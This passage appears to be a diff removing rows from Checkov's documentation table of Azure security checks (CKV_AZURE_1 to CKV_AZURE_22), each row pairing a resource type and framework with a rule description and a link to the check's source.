-| 1507 | CKV_AZURE_1              | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                                                                                                             | Terraform               | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py)                                                                           |
-| 1508 | CKV_AZURE_1              | resource                         | azurerm_virtual_machine                                                                          | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                                                                                                             | Terraform               | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py)                                                                           |
-| 1509 | CKV_AZURE_2              | resource                         | Microsoft.Compute/disks                                                                          | Ensure Azure managed disk have encryption enabled                                                                                                                                                        | arm                     | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py)                                                                             |
-| 1510 | CKV_AZURE_2              | resource                         | Microsoft.Compute/disks                                                                          | Ensure Azure managed disk have encryption enabled                                                                                                                                                        | Bicep                   | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py)                                                                             |
-| 1511 | CKV_AZURE_2              | resource                         | azurerm_managed_disk                                                                             | Ensure Azure managed disk has encryption enabled                                                                                                                                                         | Terraform               | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py)                                                                 |
-| 1512 | CKV_AZURE_3              | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure that 'supportsHttpsTrafficOnly' is set to 'true'                                                                                                                                                  | arm                     | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py)                                                             |
-| 1513 | CKV_AZURE_3              | resource                         | Microsoft.Storage/storageAccounts                                                                | Ensure that 'supportsHttpsTrafficOnly' is set to 'true'                                                                                                                                                  | Bicep                   | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py)                                                     |
-| 1514 | CKV_AZURE_3              | resource                         | azurerm_storage_account                                                                          | Ensure that 'enable_https_traffic_only' is enabled                                                                                                                                                       | Terraform               | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py)                                                 |
-| 1515 | CKV_AZURE_4              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS logging to Azure Monitoring is Configured                                                                                                                                                     | arm                     | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py)                                                                                               |
-| 1516 | CKV_AZURE_4              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS logging to Azure Monitoring is Configured                                                                                                                                                     | Bicep                   | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py)                                                                                               |
-| 1517 | CKV_AZURE_4              | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS logging to Azure Monitoring is Configured                                                                                                                                                     | Terraform               | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py)                                                                                   |
-| 1518 | CKV_AZURE_5              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure RBAC is enabled on AKS clusters                                                                                                                                                                   | arm                     | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py)                                                                                                     |
-| 1519 | CKV_AZURE_5              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure RBAC is enabled on AKS clusters                                                                                                                                                                   | Bicep                   | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py)                                                                                                     |
-| 1520 | CKV_AZURE_5              | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure RBAC is enabled on AKS clusters                                                                                                                                                                   | Terraform               | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py)                                                                                         |
-| 1521 | CKV_AZURE_6              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS has an API Server Authorized IP Ranges enabled                                                                                                                                                | arm                     | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py)                                                                     |
-| 1522 | CKV_AZURE_6              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS has an API Server Authorized IP Ranges enabled                                                                                                                                                | Bicep                   | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py)                                                                     |
-| 1523 | CKV_AZURE_6              | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS has an API Server Authorized IP Ranges enabled                                                                                                                                                | Terraform               | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py)                                                         |
-| 1524 | CKV_AZURE_7              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS cluster has Network Policy configured                                                                                                                                                         | arm                     | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py)                                                                                                 |
-| 1525 | CKV_AZURE_7              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS cluster has Network Policy configured                                                                                                                                                         | Bicep                   | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py)                                                                                                 |
-| 1526 | CKV_AZURE_7              | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS cluster has Network Policy configured                                                                                                                                                         | Terraform               | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py)                                                                                     |
-| 1527 | CKV_AZURE_8              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure Kubernetes Dashboard is disabled                                                                                                                                                                  | arm                     | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py)                                                                                         |
-| 1528 | CKV_AZURE_8              | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure Kubernetes Dashboard is disabled                                                                                                                                                                  | Bicep                   | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py)                                                                                         |
-| 1529 | CKV_AZURE_8              | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure Kubernetes Dashboard is disabled                                                                                                                                                                  | Terraform               | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py)                                                                             |
-| 1530 | CKV_AZURE_9              | resource                         | Microsoft.Network/networkSecurityGroups                                                          | Ensure that RDP access is restricted from the internet                                                                                                                                                   | arm                     | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                                                             |
-| 1531 | CKV_AZURE_9              | resource                         | Microsoft.Network/networkSecurityGroups                                                          | Ensure that RDP access is restricted from the internet                                                                                                                                                   | Bicep                   | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                                                             |
-| 1532 | CKV_AZURE_9              | resource                         | Microsoft.Network/networkSecurityGroups/securityRules                                            | Ensure that RDP access is restricted from the internet                                                                                                                                                   | arm                     | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                                                             |
-| 1533 | CKV_AZURE_9              | resource                         | Microsoft.Network/networkSecurityGroups/securityRules                                            | Ensure that RDP access is restricted from the internet                                                                                                                                                   | Bicep                   | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                                                             |
-| 1534 | CKV_AZURE_9              | resource                         | azurerm_network_security_group                                                                   | Ensure that RDP access is restricted from the internet                                                                                                                                                   | Terraform               | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py)                                                                 |
-| 1535 | CKV_AZURE_9              | resource                         | azurerm_network_security_rule                                                                    | Ensure that RDP access is restricted from the internet                                                                                                                                                   | Terraform               | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py)                                                                 |
-| 1536 | CKV_AZURE_10             | resource                         | Microsoft.Network/networkSecurityGroups                                                          | Ensure that SSH access is restricted from the internet                                                                                                                                                   | arm                     | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                                                             |
-| 1537 | CKV_AZURE_10             | resource                         | Microsoft.Network/networkSecurityGroups                                                          | Ensure that SSH access is restricted from the internet                                                                                                                                                   | Bicep                   | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                                                             |
-| 1538 | CKV_AZURE_10             | resource                         | Microsoft.Network/networkSecurityGroups/securityRules                                            | Ensure that SSH access is restricted from the internet                                                                                                                                                   | arm                     | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                                                             |
-| 1539 | CKV_AZURE_10             | resource                         | Microsoft.Network/networkSecurityGroups/securityRules                                            | Ensure that SSH access is restricted from the internet                                                                                                                                                   | Bicep                   | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                                                             |
-| 1540 | CKV_AZURE_10             | resource                         | azurerm_network_security_group                                                                   | Ensure that SSH access is restricted from the internet                                                                                                                                                   | Terraform               | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py)                                                                 |
-| 1541 | CKV_AZURE_10             | resource                         | azurerm_network_security_rule                                                                    | Ensure that SSH access is restricted from the internet                                                                                                                                                   | Terraform               | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py)                                                                 |
-| 1542 | CKV_AZURE_11             | resource                         | Microsoft.Sql/servers                                                                            | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | arm                     | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py)                                                                                   |
-| 1543 | CKV_AZURE_11             | resource                         | Microsoft.Sql/servers                                                                            | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Bicep                   | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py)                                                                                   |
-| 1544 | CKV_AZURE_11             | resource                         | azurerm_mariadb_firewall_rule                                                                    | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform               | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                       |
-| 1545 | CKV_AZURE_11             | resource                         | azurerm_mysql_firewall_rule                                                                      | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform               | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                       |
-| 1546 | CKV_AZURE_11             | resource                         | azurerm_postgresql_firewall_rule                                                                 | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform               | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                       |
-| 1547 | CKV_AZURE_11             | resource                         | azurerm_sql_firewall_rule                                                                        | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform               | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                       |
-| 1548 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/FlowLogs                                                       | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | arm                     | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                           |
-| 1549 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/FlowLogs                                                       | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | Bicep                   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                           |
-| 1550 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/FlowLogs/                                                      | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | arm                     | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                           |
-| 1551 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/FlowLogs/                                                      | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | Bicep                   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                           |
-| 1552 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/flowLogs                                                       | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | arm                     | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                           |
-| 1553 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/flowLogs                                                       | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | Bicep                   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                           |
-| 1554 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/flowLogs/                                                      | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | arm                     | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                           |
-| 1555 | CKV_AZURE_12             | resource                         | Microsoft.Network/networkWatchers/flowLogs/                                                      | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | Bicep                   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                                                           |
-| 1556 | CKV_AZURE_12             | resource                         | azurerm_network_watcher_flow_log                                                                 | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | Terraform               | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py)                                                               |
-| 1557 | CKV_AZURE_13             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | arm                     | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                                                                 |
-| 1558 | CKV_AZURE_13             | resource                         | Microsoft.Web/sites/config                                                                       | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Bicep                   | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                                                                 |
-| 1559 | CKV_AZURE_13             | resource                         | azurerm_app_service                                                                              | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Terraform               | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py)                                                                     |
-| 1560 | CKV_AZURE_13             | resource                         | azurerm_linux_web_app                                                                            | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Terraform               | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py)                                                                     |
-| 1561 | CKV_AZURE_13             | resource                         | azurerm_windows_web_app                                                                          | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Terraform               | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py)                                                                     |
-| 1562 | CKV_AZURE_13             | resource                         | config                                                                                           | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | arm                     | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                                                                 |
-| 1563 | CKV_AZURE_13             | resource                         | config                                                                                           | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Bicep                   | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                                                                 |
-| 1564 | CKV_AZURE_14             | resource                         | Microsoft.Web/sites                                                                              | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | arm                     | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py)                                                                                           |
-| 1565 | CKV_AZURE_14             | resource                         | Microsoft.Web/sites                                                                              | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Bicep                   | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py)                                                                                           |
-| 1566 | CKV_AZURE_14             | resource                         | azurerm_app_service                                                                              | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Terraform               | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py)                                                                               |
-| 1567 | CKV_AZURE_14             | resource                         | azurerm_linux_web_app                                                                            | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Terraform               | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py)                                                                               |
-| 1568 | CKV_AZURE_14             | resource                         | azurerm_windows_web_app                                                                          | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Terraform               | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py)                                                                               |
-| 1569 | CKV_AZURE_15             | resource                         | Microsoft.Web/sites                                                                              | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | arm                     | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py)                                                                                   |
-| 1570 | CKV_AZURE_15             | resource                         | Microsoft.Web/sites                                                                              | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Bicep                   | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py)                                                                                   |
-| 1571 | CKV_AZURE_15             | resource                         | azurerm_app_service                                                                              | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Terraform               | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py)                                                                       |
-| 1572 | CKV_AZURE_15             | resource                         | azurerm_linux_web_app                                                                            | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Terraform               | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py)                                                                       |
-| 1573 | CKV_AZURE_15             | resource                         | azurerm_windows_web_app                                                                          | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Terraform               | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py)                                                                       |
-| 1574 | CKV_AZURE_16             | resource                         | Microsoft.Web/sites                                                                              | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | arm                     | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py)                                                                                             |
-| 1575 | CKV_AZURE_16             | resource                         | Microsoft.Web/sites                                                                              | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Bicep                   | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py)                                                                                             |
-| 1576 | CKV_AZURE_16             | resource                         | azurerm_app_service                                                                              | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Terraform               | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py)                                                                                 |
-| 1577 | CKV_AZURE_16             | resource                         | azurerm_linux_web_app                                                                            | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Terraform               | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py)                                                                                 |
-| 1578 | CKV_AZURE_16             | resource                         | azurerm_windows_web_app                                                                          | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Terraform               | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py)                                                                                 |
-| 1579 | CKV_AZURE_17             | resource                         | Microsoft.Web/sites                                                                              | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | arm                     | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py)                                                                           |
-| 1580 | CKV_AZURE_17             | resource                         | Microsoft.Web/sites                                                                              | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Bicep                   | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py)                                                                           |
-| 1581 | CKV_AZURE_17             | resource                         | azurerm_app_service                                                                              | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Terraform               | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py)                                                               |
-| 1582 | CKV_AZURE_17             | resource                         | azurerm_linux_web_app                                                                            | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Terraform               | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py)                                                               |
-| 1583 | CKV_AZURE_17             | resource                         | azurerm_windows_web_app                                                                          | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Terraform               | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py)                                                               |
-| 1584 | CKV_AZURE_18             | resource                         | Microsoft.Web/sites                                                                              | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | arm                     | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py)                                                                                 |
-| 1585 | CKV_AZURE_18             | resource                         | Microsoft.Web/sites                                                                              | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Bicep                   | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py)                                                                                 |
-| 1586 | CKV_AZURE_18             | resource                         | azurerm_app_service                                                                              | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Terraform               | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py)                                                                     |
-| 1587 | CKV_AZURE_18             | resource                         | azurerm_linux_web_app                                                                            | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Terraform               | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py)                                                                     |
-| 1588 | CKV_AZURE_18             | resource                         | azurerm_windows_web_app                                                                          | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Terraform               | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py)                                                                     |
-| 1589 | CKV_AZURE_19             | resource                         | Microsoft.Security/pricings                                                                      | Ensure that standard pricing tier is selected                                                                                                                                                            | arm                     | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py)                                                                       |
-| 1590 | CKV_AZURE_19             | resource                         | Microsoft.Security/pricings                                                                      | Ensure that standard pricing tier is selected                                                                                                                                                            | Bicep                   | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py)                                                                       |
-| 1591 | CKV_AZURE_19             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that standard pricing tier is selected                                                                                                                                                            | Terraform               | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py)                                                           |
-| 1592 | CKV_AZURE_20             | resource                         | Microsoft.Security/securityContacts                                                              | Ensure that security contact 'Phone number' is set                                                                                                                                                       | arm                     | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py)                                                                             |
-| 1593 | CKV_AZURE_20             | resource                         | Microsoft.Security/securityContacts                                                              | Ensure that security contact 'Phone number' is set                                                                                                                                                       | Bicep                   | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py)                                                                             |
-| 1594 | CKV_AZURE_20             | resource                         | azurerm_security_center_contact                                                                  | Ensure that security contact 'Phone number' is set                                                                                                                                                       | Terraform               | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py)                                                                 |
-| 1595 | CKV_AZURE_21             | resource                         | Microsoft.Security/securityContacts                                                              | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | arm                     | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py)                                                                   |
-| 1596 | CKV_AZURE_21             | resource                         | Microsoft.Security/securityContacts                                                              | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | Bicep                   | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py)                                                                   |
-| 1597 | CKV_AZURE_21             | resource                         | azurerm_security_center_contact                                                                  | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | Terraform               | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py)                                                       |
-| 1598 | CKV_AZURE_22             | resource                         | Microsoft.Security/securityContacts                                                              | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | arm                     | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py)                                                       |
